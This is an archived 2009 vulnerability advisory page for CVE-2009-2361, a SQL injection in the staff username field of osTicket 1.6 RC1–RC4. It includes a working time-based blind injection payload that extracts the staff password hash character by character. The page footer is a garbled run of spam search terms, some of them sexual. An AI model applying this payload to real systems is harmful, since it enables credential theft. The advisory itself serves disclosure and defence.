about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , osTicket Staff Username SQL Injection Vulnerability


Title osTicket Staff Username SQL Injection Vulnerability
Published 2009-06-29-12:00AM
Updated 2009-07-20-06:26PM
Class Input Validation Error
CVE   CVE-2009-2361
Remote  Yes
Local  No
Credit  Adam Baldwin
Vulnerable  osTicket osTicket 1.6 RC4
osTicket osTicket 1.6 RC3
osTicket osTicket 1.6 RC2
osTicket osTicket 1.6 RC1
Not Vulnerable  osTicket osTicket 1.6 RC5
Code  Attackers can use a browser to exploit this issue.The following example SQL data is available:
Insert the following into the staff username '+(SELECT
IF(SUBSTRING(passwd,1,1)=CHAR(48),BENCHMARK(1000000,SHA1(1)),0) passwd
FROM ost_staff where staff_id=1) and '1'='1
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Thu, 17 Dec 2009 18:27:12 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
lobby Childrense www.easy13 Free game maxcpm.inf Wwwsexmove trishakann Www.school sex. net %252Fcompo www.0816bc htyyy oneadmin/f wwwtamilse CMS is Fre /search/ex Microsoft www.shjob. Pro boards www.myfree www,x,555, Sex.arabi. NextGFX 0735wlsc.c R...ocal/c news for c maxcpm.inf samira sex iipupelice maxcpm.inf Gay boy se Sexy babe ems www 98sex sex+kerala pinoy xxx www.51cdv. www.i12530 php-nuke 2 Www.slit.c www.56816. bbs.lt99.c Freesexyzo hindi kama pbpBB 2.0 n...ig_abs selebriti Www.analtr ip+board+2 maxcpm.inf